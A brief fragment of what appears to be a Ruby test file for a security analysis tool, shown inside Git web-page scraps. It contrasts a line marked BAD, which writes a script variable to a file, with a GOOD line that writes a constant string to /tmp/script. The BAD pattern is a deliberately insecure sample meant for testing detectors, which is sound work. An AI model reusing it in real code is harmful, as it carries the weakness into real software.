file.write(script) # BAD
|
||||
end
|
||||
|
||||
def example2
|
||||
a = "a"
|
||||
file = File.open("/tmp/script", "w")
|
||||
file.write(a) # GOOD
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user